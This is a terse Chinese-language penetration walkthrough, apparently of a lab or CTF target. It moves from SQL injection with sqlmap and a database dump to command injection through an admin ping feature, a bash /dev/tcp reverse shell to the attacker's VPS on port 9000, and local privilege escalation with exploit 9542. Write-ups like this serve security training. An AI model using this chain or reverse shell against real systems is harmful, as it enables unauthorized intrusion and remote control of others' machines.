信息收集 漏洞发现 访问80端口 给了个登录框 尝试弱口令无果后尝试sql注入 sqlmap成功找到注入点 脱库得到数据 尝试登录admin 有个ping功能 测试得知可以任意命令执行 那么反弹个shell bash -i >& /dev/tcp/vps的ip/9000 0>&1 提权 用9542 上传文件到vps 靶机切换到可写目录下载文件并编译 结束